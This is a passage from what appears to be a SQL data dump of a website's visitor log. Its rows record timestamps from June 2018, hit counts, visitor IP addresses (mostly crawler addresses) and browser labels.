50290,1,1,0,0,'54.36.149.85','other'),(257925,1528650358,1,1,0,0,'54.36.148.162','other'),(257926,1528650386,1,1,0,0,'54.36.149.89','other'),(257927,1528650389,1,1,0,0,'54.36.148.152','other'),(257928,1528650521,2,2,0,0,'141.8.142.74','other'),(257929,1528650660,1,1,0,0,'54.36.148.143','other'),(257930,1528650811,1,1,0,0,'54.36.149.43','other'),(257931,1528651189,1,1,0,0,'54.36.149.55','other'),(257932,1528651231,1,1,0,0,'54.36.148.42','other'),(257933,1528651232,1,1,0,0,'54.36.149.98','other'),(257934,1528651661,1,1,0,0,'66.249.66.157','chrome'),(257935,1528651678,1,1,0,0,'54.36.148.98','other'),(257936,1528651738,1,1,0,0,'54.36.148.181','other'),(257937,1528652011,1,1,0,0,'54.36.148.12','other'),(257938,1528652234,1,1,0,0,'54.36.148.94','other'),(257939,1528652330,1,1,0,0,'54.36.148.139','other'),(257940,1528652481,1,1,0,0,'54.36.148.105','other'),(257941,1528652768,1,1,0,0,'54.36.148.178','other'),(257942,1528653161,1,1,0,0,'184.173.238.173','msie'),(257943,1528653245,1,1,0,0,'54.36.149.71','other'),(257944,1528653353,1,1,0,0,'54.36.148.58','other'),(257945,1528653554,2,2,0,0,'91.196.178.168','chrome'),(257946,1528653951,1,1,0,0,'54.36.149.77','other'),(257947,1528654043,1,1,0,0,'54.36.148.37','other'),(257948,1528654140,1,1,0,0,'54.36.149.54','other'),(257949,1528654157,1,1,0,0,'54.36.149.4','other'),(257950,1528654306,1,1,0,0,'8.29.198.27','other'),(257951,1528654477,1,1,0,0,'54.36.148.202','other'),(257952,1528654512,1,1,0,0,'54.36.148.183','other'),(257953,1528654790,1,1,0,0,'54.36.149.41','other'),(257954,1528654928,1,1,0,0,'54.36.148.67','other'),(257955,1528655173,1,1,0,0,'54.36.148.159','other'),(257956,1528655347,1,1,0,0,'54.36.149.63','other'),(257957,1528655354,2,1,1,0,'66.249.66.157',''),(257958,1528655480,1,1,0,0,'54.36.148.147','other'),(257959,1528655619,1,1,0,0,'54.36.148.58','other'),(257960,1528655908,1,0,1,0,'66.249.66.155',''),(257961,1528655983,1,1,0,0,'141.8.142.74','other'),(257962,1528656257,1,1,0,0,'54.36.148.98','other'),(257963,1528656350,1,1,0,0,'176.14.249.49','chrome'),(257964,1528656524,2,2,0,0,'54.36.148.160','other'),(257965,1528656781,1,1,0,0,'54.36.149.86','other'),(257966,1528657057,1,1,0,0,'54.36.148.196','other'),(257967,1528657072,1,1,0,0,'54.36.148.46','other'),(257968,1528657872,1,1,0,0,'54.36.148.213','other'),(257969,1528658006,1,1,0,0,'54.36.149.87','other'),(257970,1528658022,1,1,0,0,'54.36.148.33','other'),(257971,1528658488,1,1,0,0,'54.36.148.102','other'),(257972,1528658522,2,2,0,0,'54.36.149.7','other'),(257973,1528658609,1,1,0,0,'54.36.149.103','other'),(257974,1528658748,1,1,0,0,'54.36.148.157','other'),(257975,1528658869,1,1,0,0,'54.36.148.125','other'),(257976,1528658953,1,1,0,0,'54.36.148.216','other'),(257977,1528658955,1,1,0,0,'54.36.149.19','other'),(257978,1528659136,1,1,0,0,'54.36.148.96','other'),(257979,1528659190,1,1,0,0,'54.36.148.93','other'),(257980,1528659349,1,1,0,0,'54.36.149.68','other'),(257981,1528659491,1,1,0,0,'54.36.148.217','other'),(257982,1528659534,1,1,0,0,'54.36.148.56','other'),(257983,1528659596,1,1,0,0,'54.36.149.31','other'),(257984,1528659831,1,1,0,0,'54.36.148.179','other'),(257985,1528659860,1,1,0,0,'8.29.198.26','other'),(257986,1528659879,1,1,0,0,'54.36.148.225','other'),(257987,1528659984,1,1,0,0,'194.187.170.111','other'),(257988,1528660021,1,1,0,0,'54.36.148.137','other'),(257989,1528660159,1,1,0,0,'180.76.15.161','other'),(257990,1528660200,1,1,0,0,'54.36.148.10','other'),(257991,1528660438,1,1,0,0,'54.36.149.11','other'),(257992,1528660863,1,1,0,0,'54.36.149.20','other'),(257993,1528660933,1,1,0,0,'54.36.148.129','other'),(257994,1528661195,1,1,0,0,'54.36.149.65','other'),(257995,1528661198,1,1,0,0,'54.36.148.199','other'),(257996,1528661238,1,1,0,0,'216.244.66.241','other'),(257997,1528661299,1,1,0,0,'54.36.148.95','other'),(257998,1528661386,1,1,0,0,'54.36.148.55','other'),(257999,1528661595,1,1,0,0,'54.165.59.7','other'),(258000,1528661731,1,1,0,0,'54.36.148.212','other'),(258001,1528661751,1,1,0,0,'54.36.149.54','other'),(258002,1528661761,1,1,0,0,'54.36.148.192','other'),(258003,1528662622,1,1,0,0,'91.209.11.236','other'),(258004,1528662747,1,1,0,0,'141.8.142.74','other'),(258005,1528663018,1,1,0,0,'54.36.149.16','other'),(258006,1528663392,1,1,0,0,'54.36.148.75','other'),(258007,1528663428,1,1,0,0,'178.154.171.88','other'),(258008,1528663511,1,1,0,0,'54.36.148.93','other'),(258009,1528663855,1,1,0,0,'54.36.149.105','other'),(258010,1528663868,1,1,0,0,'54.36.148.232','other'),(258011,1528663927,1,1,0,0,'54.36.149.72','other'),(258012,1528664244,1,0,1,0,'66.249.66.74',''),(258013,1528664525,1,1,0,0,'54.36.148.217','other'),(258014,1528664675,1,1,0,0,'54.36.148.84','other'),(258015,1528664983,1,1,0,0,'54.36.148.251','other'),(258016,1528664984,1,1,0,0,'54.36.149.100','other'),(258017,1528664993,1,1,0,0,'95.163.255.13','other'),(258018,1528665146,1,1,0,0,'8.29.198.25','other'),(258019,1528665238,1,1,0,0,'54.36.148.184','other'),(258020,1528665257,1,1,0,0,'54.36.148.149','other'),(258021,1528665266,1,1,0,0,'178.140.84.158','msie'),(258022,1528665379,1,1,0,0,'54.36.148.53','other'),(258023,1528665433,1,1,0,0,'54.36.149.66','other'),(258024,1528665517,1,1,0,0,'54.36.148.77','other'),(258025,1528665616,1,1,0,0,'54.36.148.17','other'),(258026,1528665753,1,1,0,0,'180.76.15.11','other'),(258027,1528665821,1,1,0,0,'54.36.148.139','other'),(258028,1528665929,1,1,0,0,'54.36.149.57','other'),(258029,1528665938,1,0,1,0,'66.249.66.156',''),(258030,1528666049,1,1,0,0,'54.36.148.13','other'),(258031,1528666079,1,1,0,0,'54.36.148.164','other'),(258032,1528666231,1,1,0,0,'54.36.148.129','other'),(258033,1528666327,1,1,0,0,'54.36.148.175','other'),(258034,1528666340,1,1,0,0,'54.36.149.21','other'),(258035,1528666365,2,2,0,0,'216.244.66.241','other'),(258036,1528666441,1,1,0,0,'141.8.142.74','other'),(258037,1528666503,1,1,0,0,'54.36.148.174','other'),(258038,1528666872,1,1,0,0,'54.36.148.185','other'),(258039,1528666928,1,1,0,0,'54.36.148.65','other'),(258040,1528667047,1,1,0,0,'54.36.149.15','other'),(258041,1528667159,1,1,0,0,'95.163.255.4','other'),(258042,1528667171,1,1,0,0,'178.154.171.88','other'),(258043,1528667597,1,1,0,0,'54.36.148.173','other'),(258044,1528667614,1,1,0,0,'54.36.148.190','other'),(258045,1528667804,1,1,0,0,'54.36.148.199','other'),(258046,1528667818,1,1,0,0,'216.244.66.241','other'),(258047,1528667821,1,1,0,0,'54.36.148.157','other'),(258048,1528667904,1,1,0,0,'54.36.148.48','other'),(258049,1528668288,1,1,0,0,'54.36.149.76','other'),(258050,1528668303,1,1,0,0,'54.36.148.230','other'),(258051,1528668536,1,1,0,0,'54.36.149.4','other'),(258052,1528668555,1,1,0,0,'66.249.66.75','chrome'),(258053,1528668700,1,1,0,0,'54.36.148.106','other'),(258054,1528668705,1,1,0,0,'141.8.142.74','other'),(258055,1528668877,1,1,0,0,'54.36.148.235','other'),(258056,1528669344,1,1,0,0,'54.36.148.156','other'),(258057,1528669839,1,1,0,0,'54.36.148.33','other'),(258058,1528670189,1,1,0,0,'54.36.149.45','other'),(258059,1528670571,1,1,0,0,'54.36.148.88','other'),(258060,1528670697,1,1,0,0,'8.29.198.25','other'),(258061,1528670788,1,1,0,0,'141.8.142.74','other'),(258062,1528671026,1,1,0,0,'120.79.186.194','other'),(258063,1528671029,1,1,0,0,'47.106.37.223','other'),(258066,1528671207,1,1,0,0,'54.36.149.56','other'),(258067,1528672475,1,1,0,0,'54.36.149.46','other'),(258068,1528672496,1,1,0,0,'54.36.149.23','other'),(258069,1528672998,44,44,0,0,'144.217.5.52','other'),(258070,1528673295,1,1,0,0,'54.36.148.236','other'),(258071,1528673349,1,1,0,0,'54.36.149.69','other'),(258072,1528673462,1,1,0,0,'54.36.148.206','other'),(258073,1528673558,1,1,0,0,'66.249.66.156','chrome'),(258074,1528673860,1,1,0,0,'54.36.148.73','other'),(258075,1528673895,2,2,0,0,'216.244.66.241','other'),(258076,1528673938,1,1,0,0,'54.36.148.155','other'),(258077,1528674038,1,1,0,0,'54.36.148.138','other'),(258078,1528674074,1,1,0,0,'13.57.220.0','chrome'),(258079,1528674111,1,1,0,0,'54.36.148.25','other'),(258080,1528674445,1,1,0,0,'54.36.148.185','other'),(258081,1528674477,1,1,0,0,'54.36.149.15','other'),(258082,1528674830,1,1,0,0,'54.36.148.97','other'),(258083,1528674951,1,1,0,0,'54.36.148.19','other'),(258084,1528674987,1,1,0,0,'54.36.149.93','other'),(258085,1528675406,1,1,0,0,'54.36.148.79','other'),(258086,1528675423,3,3,0,0,'216.244.66.241','other'),(258087,1528675465,1,1,0,0,'54.36.148.239','other'),(258088,1528675536,1,1,0,0,'141.8.142.74','other'),(258089,1528675598,1,1,0,0,'54.36.148.156','other'),(258090,1528675684,1,1,0,0,'54.36.148.93','other'),(258091,1528675775,1,1,0,0,'54.36.148.120','other'),(258092,1528675882,1,1,0,0,'54.36.148.235','other'),(258093,1528675980,1,1,0,0,'8.29.198.27','other'),(258094,1528676263,1,1,0,0,'54.36.148.31','other'),(258095,1528676356,1,1,0,0,'54.36.148.234','other'),(258096,1528676920,1,1,0,0,'54.36.149.64','other'),(258097,1528676992,1,1,0,0,'54.36.148.255','other'),(258098,1528677152,1,1,0,0,'54.36.149.46','other'),(258099,1528677264,1,1,0,0,'54.36.148.186','other'),(258100,1528677436,1,1,0,0,'54.36.148.202','other'),(258101,1528677515,1,1,0,0,'54.36.149.11','other'),(258102,1528677595,1,1,0,0,'54.36.148.27','other'),(258103,1528677731,1,0,1,0,'66.249.66.157',''),(258104,1528677735,1,1,0,0,'54.36.148.18','other'),(258105,1528678172,1,1,0,0,'54.36.148.74','other'),(258106,1528678330,2,2,0,0,'54.36.148.201','other'),(258107,1528678470,1,1,0,0,'54.36.149.20','other'),(258108,1528678538,1,1,0,0,'54.165.59.7','other'),(258109,1528678710,1,1,0,0,'54.36.148.136','other'),(258110,1528678911,1,1,0,0,'54.36.148.33','other'),(258111,1528678924,1,1,0,0,'141.8.142.74','other'),(258112,1528679131,1,1,0,0,'54.36.148.142','other'),(258113,1528679195,1,1,0,0,'54.36.148.134','other'),(258114,1528679226,1,1,0,0,'54.36.148.245','other'),(258115,1528679344,2,2,0,0,'216.244.66.241','other'),(258116,1528679426,1,1,0,0,'54.36.148.175','other'),(258117,1528679619,2,2,0,0,'54.36.149.26','other'),(258118,1528679811,1,1,0,0,'54.36.149.49','other'),(258119,1528679853,1,1,0,0,'54.36.149.87','other'),(258120,1528679911,1,1,0,0,'54.36.148.135','other'),(258121,1528680636,1,1,0,0,'54.36.148.94','other'),(258122,1528680824,1,1,0,0,'54.36.148.124','other'),(258123,1528680859,1,1,0,0,'54.36.148.47','other'),(258124,1528680945,1,1,0,0,'54.36.148.60','other'),(258125,1528681021,1,0,1,0,'66.249.66.157',''),(258126,1528681107,1,0,1,0,'66.249.66.156',''),(258127,1528681251,1,1,0,0,'54.36.148.66','other'),(258128,1528681322,1,1,0,0,'54.36.148.186','other'),(258129,1528681537,1,1,0,0,'8.29.198.26','other'),(258130,1528681719,1,1,0,0,'54.36.148.90','other'),(258131,1528681911,1,1,0,0,'54.36.148.140','other'),(258132,1528682247,1,1,0,0,'54.36.149.104','other'),(258133,1528682250,1,1,0,0,'54.36.148.117','other'),(258134,1528682343,1,1,0,0,'54.36.148.229','other'),(258135,1528682668,1,1,0,0,'54.36.148.91','other'),(258136,1528682752,1,1,0,0,'54.36.148.198','other'),(258137,1528682870,1,1,0,0,'54.36.148.97','other'),(258138,1528682915,1,1,0,0,'180.76.15.149','other'),(258139,1528683063,1,1,0,0,'54.36.148.41','other'),(258140,1528683076,1,1,0,0,'54.36.149.66','other'),(258141,1528683475,1,1,0,0,'216.244.66.241','other'),(258142,1528683586,1,1,0,0,'54.36.149.38','other'),(258143,1528683907,1,0,1,0,'66.249.66.155',''),(258144,1528683915,1,1,0,0,'54.36.148.64','other'),(258145,1528684026,1,1,0,0,'54.36.148.191','other'),(258146,1528684082,1,0,1,0,'66.249.66.156',''),(258147,1528684100,1,1,0,0,'54.36.148.40','other'),(258148,1528684108,8,8,0,0,'144.76.176.171','other'),(258149,1528684394,1,1,0,0,'54.36.148.18','other'),(258150,1528684401,2,2,0,0,'216.244.66.241','other'),(258151,1528684677,1,1,0,0,'54.36.148.37','other'),(258152,1528684741,1,1,0,0,'54.36.149.10','other'),(258153,1528684866,1,1,0,0,'91.209.11.236','other'),(258154,1528685062,1,1,0,0,'54.36.148.73','other'),(258155,1528685183,1,1,0,0,'54.36.148.186','other'),(258156,1528685255,1,1,0,0,'54.36.148.250','other'),(258157,1528685329,1,1,0,0,'54.36.148.63','other'),(258158,1528685636,1,1,0,0,'54.36.148.45','other'),(258159,1528685691,1,1,0,0,'54.36.149.69','other'),(258160,1528685694,1,0,1,0,'66.249.66.75',''),(258161,1528685788,1,1,0,0,'54.36.148.126','other'),(258162,1528686040,1,1,0,0,'178.154.171.88','other'),(258163,1528686065,1,1,0,0,'54.36.149.35','other'),(258164,1528686075,1,0,1,0,'66.249.66.74',''),(258165,1528686380,1,1,0,0,'54.36.148.21','other'),(258166,1528686488,1,1,0,0,'54.36.148.31','other'),(258167,1528686798,1,1,0,0,'54.36.148.165','other'),(258168,1528686820,1,1,0,0,'8.29.198.25','other'),(258169,1528686880,1,1,0,0,'54.36.148.169','other'),(258170,1528686952,1,1,0,0,'54.36.148.69','other'),(258171,1528686954,1,1,0,0,'54.36.149.62','other'),(258172,1528686961,1,1,0,0,'54.36.148.108','other'),(258173,1528687190,1,1,0,0,'216.244.66.241','other'),(258174,1528687504,1,1,0,0,'54.36.148.247','other'),(258175,1528687662,1,1,0,0,'54.36.148.96','other'),(258176,1528687717,1,1,0,0,'54.36.149.65','other'),(258177,1528687821,2,2,0,0,'54.36.148.80','other'),(258178,1528687860,1,1,0,0,'54.36.148.143','other'),(258179,1528688227,1,1,0,0,'54.36.148.234','other'),(258180,1528688386,1,1,0,0,'54.36.148.181','other'),(258181,1528688497,1,1,0,0,'54.36.148.189','other'),(258182,1528688560,1,1,0,0,'54.36.148.156','other'),(258183,1528688626,1,1,0,0,'54.36.148.23','other'),(258184,1528688678,1,1,0,0,'216.244.66.241','other'),(258185,1528688829,1,0,1,0,'66.249.66.155',''),(258186,1528689014,1,1,0,0,'5.9.112.210','other'),(258187,1528689097,1,1,0,0,'54.36.149.1','other'),(258188,1528689145,1,1,0,0,'54.36.149.69','other'),(258189,1528689391,1,1,0,0,'54.36.148.104','other'),(258190,1528689942,1,1,0,0,'54.36.148.105','other'),(258191,1528689974,1,1,0,0,'216.244.66.241','other'),(258192,1528690045,1,1,0,0,'54.36.148.253','other'),(258193,1528690114,1,1,0,0,'54.36.149.41','other'),(258194,1528690508,1,1,0,0,'54.36.148.112','other'),(258195,1528690751,1,1,0,0,'178.154.171.88','other'),(258196,1528690880,1,1,0,0,'54.36.149.20','other'),(258197,1528691034,1,1,0,0,'54.36.149.62','other'),(258198,1528691141,1,1,0,0,'54.36.148.202','other'),(258199,1528691203,1,1,0,0,'54.36.148.208','other'),(258200,1528691261,1,0,1,0,'66.249.66.157',''),(258201,1528691359,1,1,0,0,'54.36.148.29','other'),(258202,1528691623,1,1,0,0,'54.36.148.110','other'),(258203,1528691783,1,1,0,0,'54.36.149.75','other'),(258204,1528691894,1,1,0,0,'54.36.148.145','other'),(258205,1528691974,1,1,0,0,'157.55.39.233','other'),(258206,1528692088,1,1,0,0,'54.36.149.16','other'),(258207,1528692125,1,1,0,0,'216.244.66.241','other'),(258208,1528692267,1,1,0,0,'54.36.148.29','other'),(258209,1528692370,1,1,0,0,'54.36.148.47','other'),(258210,1528692375,1,1,0,0,'8.29.198.26','other'),(258211,1528692482,1,1,0,0,'178.154.171.88','other'),(258212,1528692657,1,1,0,0,'54.36.148.250','other'),(258213,1528692695,1,1,0,0,'54.36.148.52','other'),(258214,1528692746,1,0,1,0,'66.249.66.155',''),(258215,1528692754,1,1,0,0,'54.36.148.45','other'),(258216,1528693027,1,1,0,0,'54.36.148.70','other'),(258217,1528693348,2,2,0,0,'54.36.148.123','other'),(258218,1528693511,1,1,0,0,'216.244.66.241','other'),(258219,1528693822,1,1,0,0,'54.36.148.28','other'),(258220,1528693883,1,1,0,0,'46.188.90.253','msie'),(258221,1528693971,1,1,0,0,'54.36.148.187','other'),(258222,1528693974,1,1,0,0,'54.36.148.46','other'),(258223,1528693995,1,1,0,0,'54.36.149.79','other'),(258224,1528694037,1,1,0,0,'54.36.148.125','other'),(258225,1528694055,1,1,0,0,'54.36.148.161','other'),(258226,1528694319,1,1,0,0,'54.36.148.131','other'),(258227,1528694329,1,1,0,0,'54.36.148.63','other'),(258228,1528694561,2,2,0,0,'141.8.142.74','other'),(258229,1528694812,1,1,0,0,'54.36.149.70','other'),(258230,1528694817,1,1,0,0,'54.36.148.120','other'),(258231,1528695075,1,1,0,0,'216.244.66.241','other'),(258232,1528695162,1,1,0,0,'54.36.149.89','other'),(258233,1528695280,1,1,0,0,'54.36.149.102','other'),(258234,1528695626,1,1,0,0,'54.36.148.205','other'),(258235,1528695760,1,1,0,0,'54.36.148.18','other'),(258236,1528695785,1,1,0,0,'54.36.148.218','other'),(258237,1528695825,1,1,0,0,'54.36.148.250','other'),(258238,1528695831,1,1,0,0,'207.46.13.229','other'),(258239,1528695834,1,1,0,0,'54.36.148.81','other'),(258240,1528695873,1,1,0,0,'54.36.149.11','other'),(258241,1528695996,1,1,0,0,'54.36.148.72','other'),(258242,1528696045,1,1,0,0,'54.36.148.87','other'),(258243,1528696153,1,1,0,0,'54.36.148.126','other'),(258244,1528696373,1,1,0,0,'130.180.219.148','chrome'),(258245,1528696482,1,1,0,0,'216.244.66.241','other'),(258246,1528696550,1,1,0,0,'37.55.77.44','chrome'),(258247,1528696621,1,1,0,0,'54.36.149.82','other'),(258248,1528696827,1,1,0,0,'54.36.148.57','other'),(258249,1528696935,1,1,0,0,'157.55.39.233','other'),(258250,1528697070,1,1,0,0,'54.36.148.230','other'),(258251,1528697182,1,1,0,0,'54.36.149.22','other'),(258252,1528697222,1,1,0,0,'54.36.149.105','other'),(258253,1528697392,4,4,0,0,'216.244.66.241','other'),(258254,1528697603,2,2,0,0,'91.196.178.60','chrome'),(258255,1528697648,1,1,0,0,'134.249.214.53','firefox'),(258256,1528697656,1,1,0,0,'8.29.198.25','other'),(258257,1528697767,1,1,0,0,'54.36.148.108','other'),(258258,1528698063,1,1,0,0,'54.36.148.210','other'),(258259,1528698123,1,1,0,0,'54.36.148.127','other'),(258260,1528698209,1,1,0,0,'130.180.219.148','chrome'),(258261,1528698227,1,1,0,0,'54.36.149.31','other'),(258262,1528698236,1,1,0,0,'54.36.148.115','other'),(258263,1528698401,1,1,0,0,'94.178.147.11','chrome'),(258264,1528698533,1,1,0,0,'54.36.148.135','other'),(258265,1528698662,5,5,0,0,'91.196.178.70','chrome'),(258266,1528698765,1,1,0,0,'141.8.142.74','other'),(258267,1528698766,1,1,0,0,'92.112.227.213','firefox'),(258268,1528698869,1,0,1,0,'66.249.66.157',''),(258269,1528699103,1,1,0,0,'40.77.167.82','other'),(258270,1528699252,1,1,0,0,'54.36.148.190','other'),(258271,1528699275,1,1,0,0,'54.36.148.92','other'),(258272,1528699483,2,2,0,0,'82.196.1.179','chrome'),(258273,1528699489,3,3,0,0,'88.99.194.48','firefox'),(258274,1528699712,1,1,0,0,'54.36.148.229','other'),(258275,1528700239,1,1,0,0,'141.8.142.74','other'),(258276,1528700303,1,1,0,0,'54.36.148.16','other'),(258277,1528700365,1,1,0,0,'54.36.149.26','other'),(258278,1528700484,1,1,0,0,'54.36.148.200','other'),(258279,1528700502,1,1,0,0,'54.36.149.78','other'),(258280,1528700514,1,1,0,0,'54.36.148.60','other'),(258281,1528700520,1,1,0,0,'54.36.149.56','other'),(258282,1528700719,1,1,0,0,'54.36.148.139','other'),(258283,1528700742,1,0,1,0,'66.249.66.157',''),(258284,1528700774,1,1,0,0,'54.36.148.105','other'),(258285,1528700791,1,1,0,0,'54.36.148.49','other'),(258286,1528700798,1,1,0,0,'54.36.148.247','other'),(258287,1528700961,1,1,0,0,'54.36.148.145','other'),(258288,1528700971,1,1,0,0,'46.149.92.207','chrome'),(258289,1528701002,1,1,0,0,'66.249.66.74','chrome'),(258290,1528701106,1,1,0,0,'54.36.149.76','other'),(258291,1528701293,1,1,0,0,'178.154.171.88','other'),(258292,1528701579,1,1,0,0,'216.244.66.241','other'),(258293,1528701628,1,1,0,0,'37.54.130.86','chrome'),(258294,1528701858,1,1,0,0,'54.36.148.35','other'),(258295,1528701902,1,1,0,0,'54.36.149.54','other'),(258296,1528701913,3,3,0,0,'130.180.216.107','chrome'),(258297,1528701926,1,0,1,0,'66.249.66.156',''),(258298,1528701950,1,1,0,0,'40.77.167.82','other'),(258299,1528701954,1,1,0,0,'162.210.196.100','other'),(258300,1528701965,2,0,2,0,'66.249.66.157',''),(258301,1528701996,1,1,0,0,'54.36.148.23','other'),(258302,1528702597,1,1,0,0,'54.36.149.0','other'),(258303,1528702867,1,1,0,0,'37.204.196.142','chrome'),(258304,1528703012,1,1,0,0,'54.36.148.19','other'),(258305,1528703062,1,1,0,0,'82.196.1.179','chrome'),(258306,1528703202,1,1,0,0,'8.29.198.27','other'),(258307,1528703312,1,1,0,0,'54.36.148.156','other'),(258308,1528703358,1,1,0,0,'54.36.148.123','other'),(258309,1528703365,1,1,0,0,'54.36.149.73','other'),(258310,1528703446,1,1,0,0,'54.36.148.45','other'),(258311,1528703477,1,1,0,0,'54.36.149.2','other'),(258312,1528703729,1,1,0,0,'54.36.148.222','other'),(258313,1528703759,1,1,0,0,'54.36.148.168','other'),(258314,1528704259,1,1,0,0,'54.36.149.45','other'),(258315,1528704309,2,0,2,0,'66.249.66.155',''),(258316,1528704464,1,1,0,0,'62.205.134.182','msie'),(258317,1528704488,1,0,1,0,'66.249.66.157',''),(258318,1528704982,1,1,0,0,'157.55.39.231','other'),(258319,1528704993,1,1,0,0,'178.62.238.64','chrome'),(258320,1528705056,1,1,0,0,'54.36.148.29','other'),(258321,1528705080,1,1,0,0,'54.36.149.6','other'),(258322,1528705183,1,1,0,0,'134.249.147.14','chrome'),(258323,1528705304,1,1,0,0,'54.36.148.74','other'),(258324,1528705361,1,1,0,0,'54.36.149.84','other'),(258325,1528705554,1,1,0,0,'54.36.148.242','other'),(258326,1528705964,1,1,0,0,'54.36.148.64','other'),(258327,1528706196,1,1,0,0,'54.36.148.90','other'),(258328,1528706239,1,1,0,0,'62.205.134.182','msie'),(258329,1528706384,3,3,0,0,'91.196.178.169','chrome'),(258330,1528706390,1,1,0,0,'54.36.148.109','other'),(258331,1528706528,3,3,0,0,'91.196.178.70','chrome'),(258332,1528706550,1,1,0,0,'54.36.149.21','other'),(258333,1528706834,1,1,0,0,'216.244.66.241','other'),(258334,1528707056,1,1,0,0,'54.36.149.51','other'),(258335,1528707107,1,1,0,0,'54.36.149.40','other'),(258336,1528707141,1,1,0,0,'54.36.148.189','other'),(258337,1528707273,1,1,0,0,'54.36.148.110','other'),(258338,1528707351,1,1,0,0,'54.36.148.167','other'),(258339,1528707385,1,1,0,0,'141.8.142.74','other'),(258340,1528707509,1,1,0,0,'54.36.148.135','other'),(258341,1528707606,1,1,0,0,'54.36.149.54','other'),(258342,1528708312,1,1,0,0,'47.96.233.222','other'),(258343,1528708319,1,1,0,0,'54.36.149.68','other'),(258344,1528708419,1,1,0,0,'54.36.148.188','other'),(258345,1528708492,1,1,0,0,'8.29.198.27','other'),(258346,1528708600,2,2,0,0,'91.196.177.46','chrome'),(258347,1528708635,1,1,0,0,'54.36.148.134','other'),(258348,1528708768,1,1,0,0,'54.36.148.60','other'),(258349,1528708846,1,1,0,0,'54.36.149.44','other'),(258350,1528708854,2,2,0,0,'91.196.178.70','chrome'),(258351,1528708903,1,1,0,0,'54.36.148.87','other'),(258352,1528709025,1,1,0,0,'40.77.167.82','other'),(258353,1528709040,1,1,0,0,'54.36.149.30','other'),(258354,1528709136,1,1,0,0,'91.196.178.130','firefox'),(258355,1528709351,1,1,0,0,'54.36.148.207','other'),(258356,1528709494,1,1,0,0,'66.249.66.155','chrome'),(258357,1528709662,1,1,0,0,'54.36.148.254','other'),(258358,1528709883,1,1,0,0,'54.36.148.225','other'),(258359,1528710336,1,1,0,0,'54.36.149.66','other'),(258360,1528710551,1,1,0,0,'95.135.30.77','firefox'),(258361,1528710574,1,1,0,0,'40.77.167.82','other'),(258362,1528710809,2,2,0,0,'216.244.66.241','other'),(258363,1528710947,1,1,0,0,'54.36.148.173','other'),(258364,1528710996,1,1,0,0,'46.161.9.39','firefox'),(258365,1528711315,1,1,0,0,'54.36.148.237','other'),(258366,1528711366,1,1,0,0,'54.36.148.213','other'),(258367,1528711397,1,1,0,0,'54.36.148.76','other'),(258368,1528711564,1,1,0,0,'54.36.149.53','other'),(258369,1528711609,1,1,0,0,'54.36.149.95','other'),(258370,1528711747,1,1,0,0,'54.165.59.7','other'),(258371,1528711902,1,1,0,0,'54.36.149.97','other'),(258372,1528711978,1,1,0,0,'54.36.149.10','other'),(258373,1528712073,1,1,0,0,'54.36.149.80','other'),(258374,1528712079,1,1,0,0,'54.36.148.17','other'),(258375,1528712135,2,2,0,0,'87.250.224.46','other'),(258376,1528712567,1,1,0,0,'54.36.148.199','other'),(258377,1528712656,2,2,0,0,'91.196.177.46','chrome'),(258378,1528712738,1,1,0,0,'54.36.148.248','other'),(258379,1528712744,1,0,1,0,'66.249.66.157',''),(258380,1528712793,1,1,0,0,'54.36.148.16','other'),(258381,1528712924,1,1,0,0,'54.36.148.125','other'),(258382,1528713048,1,1,0,0,'180.76.15.25','other'),(258383,1528713075,1,1,0,0,'54.36.148.27','other'),(258384,1528713240,1,1,0,0,'54.36.148.149','other'),(258385,1528713302,1,1,0,0,'54.36.148.156','other'),(258386,1528713307,1,1,0,0,'78.46.107.80','other'),(258387,1528713534,1,1,0,0,'54.36.148.105','other'),(258388,1528713604,1,1,0,0,'91.196.178.133','chrome'),(258389,1528713624,1,1,0,0,'54.36.149.9','other'),(258390,1528713807,1,1,0,0,'54.36.148.56','other'),(258391,1528713902,2,2,0,0,'130.180.218.213','chrome'),(258392,1528714034,1,1,0,0,'54.36.148.42','other'),(258393,1528714035,1,1,0,0,'8.29.198.26','other'),(258394,1528714323,1,1,0,0,'54.36.148.58','other'),(258395,1528714324,1,1,0,0,'54.36.148.24','other'),(258396,1528714368,1,1,0,0,'54.36.148.112','other'),(258397,1528714465,1,1,0,0,'54.36.148.185','other'),(258398,1528714538,1,1,0,0,'54.36.149.94','other'),(258399,1528714637,1,1,0,0,'54.36.148.45','other'),(258400,1528714738,1,1,0,0,'54.36.149.81','other'),(258401,1528714785,1,1,0,0,'54.36.148.97','other'),(258402,1528715408,1,1,0,0,'194.44.220.197','firefox'),(258403,1528715559,1,1,0,0,'54.36.148.65','other'),(258404,1528715589,1,1,0,0,'54.36.148.222','other'),(258405,1528715684,1,1,0,0,'54.36.148.44','other'),(258406,1528716048,1,1,0,0,'216.244.66.241','other'),(258407,1528716097,1,1,0,0,'95.132.22.177','chrome'),(258408,1528716128,1,1,0,0,'54.36.148.172','other'),(258409,1528716455,1,1,0,0,'54.36.149.56','other'),(258410,1528716542,1,1,0,0,'54.36.148.136','other'),(258411,1528716643,1,0,1,0,'66.249.66.155',''),(258412,1528716775,1,1,0,0,'54.36.149.13','other'),(258413,1528716906,1,1,0,0,'54.36.148.66','other'),(258414,1528716997,1,1,0,0,'54.36.148.48','other'),(258415,1528716998,1,1,0,0,'54.36.148.244','other'),(258416,1528717667,1,1,0,0,'54.36.148.206','other'),(258417,1528717747,1,1,0,0,'91.196.178.36','chrome'),(258418,1528717868,1,1,0,0,'54.36.149.36','other'),(258419,1528717962,1,1,0,0,'141.8.142.74','other'),(258420,1528718043,1,1,0,0,'54.36.148.249','other'),(258421,1528718152,1,1,0,0,'195.10.210.70','chrome'),(258422,1528718341,1,1,0,0,'195.10.210.70','firefox'),(258423,1528718350,1,1,0,0,'91.196.178.66','firefox'),(258424,1528718427,1,1,0,0,'54.36.148.15','other'),(258425,1528718581,1,1,0,0,'54.36.148.215','other'),(258426,1528718592,1,0,1,0,'66.249.66.157',''),(258427,1528718678,1,1,0,0,'91.196.178.181','chrome'),(258428,1528718801,1,1,0,0,'54.36.148.192','other'),(258429,1528718805,1,1,0,0,'54.36.148.12','other'),(258430,1528718834,1,1,0,0,'54.36.149.100','other'),(258431,1528719046,1,1,0,0,'54.36.148.91','other'),(258432,1528719104,1,1,0,0,'54.36.148.66','other'),(258433,1528719106,1,1,0,0,'54.36.148.74','other'),(258434,1528719159,1,1,0,0,'54.36.148.203','other'),(258435,1528719172,1,0,1,0,'66.249.66.74',''),(258436,1528719347,1,1,0,0,'8.29.198.25','other'),(258437,1528719552,1,1,0,0,'54.36.149.80','other'),(258438,1528719564,1,1,0,0,'95.133.61.92','chrome'),(258439,1528719781,1,1,0,0,'54.36.149.23','other'),(258440,1528719840,2,2,0,0,'216.244.66.241','other'),(258441,